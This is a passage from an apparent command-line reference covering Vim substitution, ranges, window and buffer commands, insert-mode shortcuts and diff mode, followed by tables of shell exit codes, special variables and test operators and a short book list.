:s/old/new/g        " All occurrences on current line
:%s/old/new/g       " All occurrences in file
:%s/old/new/gc      " All occurrences, confirm each

" Range substitution
:10,20s/old/new/g   " Lines 10-20
:'<,'>s/old/new/g   " Visual selection
:.,$s/old/new/g     " Current line to end

" Case handling
:%s/old/new/gi      " Case insensitive search
:%s/old/\U&/g       " Replace with uppercase
:%s/old/\L&/g       " Replace with lowercase

" Capture groups
:%s/\(\w\+\)/[\1]/g         " Wrap words in brackets
:%s/^\(.*\)$/"\1",/         " Add quotes and comma

" Magic/very magic
:%s/\v(\w+)/[\1]/g          " Very magic (extended regex)

14.10. Command-line Mode Power

" Execute on pattern match
:g/pattern/d            " Delete all matching lines
:g/pattern/normal @q    " Run macro on matches
:v/pattern/d            " Delete non-matching lines (inverse)

" Execute shell command
:!command               " Run external command
:r !command             " Read command output into buffer
:w !command             " Write buffer to command stdin
:%!sort                 " Filter buffer through sort

" Ranges with patterns
:/start/,/end/d         " Delete between patterns
:/start/,/end/s/a/b/g   " Substitute between patterns

14.11. Window and Buffer Management

" Splits
<C-w>s      " Horizontal split
<C-w>v      " Vertical split
<C-w>q      " Close split
<C-w>o      " Close all other splits

" Navigation
<C-w>h/j/k/l    " Move between splits
<C-w>H/J/K/L    " Move split to edge
<C-w>=          " Equalize split sizes
<C-w>_          " Maximize height
<C-w>|          " Maximize width

" Buffers
:ls             " List buffers
:bn / :bp       " Next/previous buffer
:b{n}           " Go to buffer n
:bd             " Delete buffer

14.12. Insert Mode Shortcuts

<C-r>{reg}  " Insert from register
<C-r>=      " Insert expression result (calculator)
<C-a>       " Insert last inserted text
<C-w>       " Delete word before cursor
<C-u>       " Delete to start of line
<C-t>       " Indent current line
<C-d>       " Unindent current line
<C-n>       " Autocomplete (next match)
<C-p>       " Autocomplete (previous match)
<C-o>       " Execute one normal mode command

14.12.1. Insert Mode: Expression Register (Calculator)

<C-r>=2+2<Enter>        " Inserts 4
<C-r>=system('date')    " Inserts current date
<C-r>=expand('%')       " Inserts filename

14.13. Advanced: Recording and Efficiency

14.13.1. Edit Existing File at Specific Line

vim +42 file.txt        # Open at line 42
vim +/pattern file.txt  # Open at first match
vim -c 'normal G' file  # Open at end of file

14.13.2. Open Multiple Files

vim -o file1 file2      # Horizontal splits
vim -O file1 file2      # Vertical splits
vim -p file1 file2      # Tabs

14.13.3. Diff Mode

vim -d file1 file2      # Open in diff mode

In vim:

]c          " Next difference
[c          " Previous difference
do          " Get diff from other window (obtain)
dp          " Put diff to other window

15. Quick Reference Tables

15.1. Exit Codes

Code Meaning

0

Success

1

General error

2

Misuse of shell command

126

Permission denied (cannot execute)

127

Command not found

128+n

Fatal signal n (e.g., 130 = Ctrl+C)

255

Exit status out of range

15.2. Special Variables

Variable Description

$?

Exit code of last command

$$

Current shell PID

$!

PID of last background process

$0

Script name

$1-$9

Positional parameters

$@

All parameters (separate words)

$*

All parameters (single word)

$#

Number of parameters

$_

Last argument of previous command

15.3. Test Operators

File Tests String Tests Numeric Tests

-e exists

-z empty

-eq equal

-f is file

-n not empty

-ne not equal

-d is directory

= equal

-lt less than

-r readable

!= not equal

-le less or equal

-w writable

< less than

-gt greater than

-x executable

> greater than

-ge greater or equal

-s size > 0

-L is symlink

16. Resources and References

16.1. Essential Reading

16.3. Books

  • The Linux Command Line - William Shotts (free PDF)

  • Classic Shell Scripting - O’Reilly

  • sed & awk - O’Reilly (the bible)

  • Wicked Cool Shell Scripts - No Starch Press

16.5. Practice


"The command line is a time machine. Learn it once, use it for 30 years."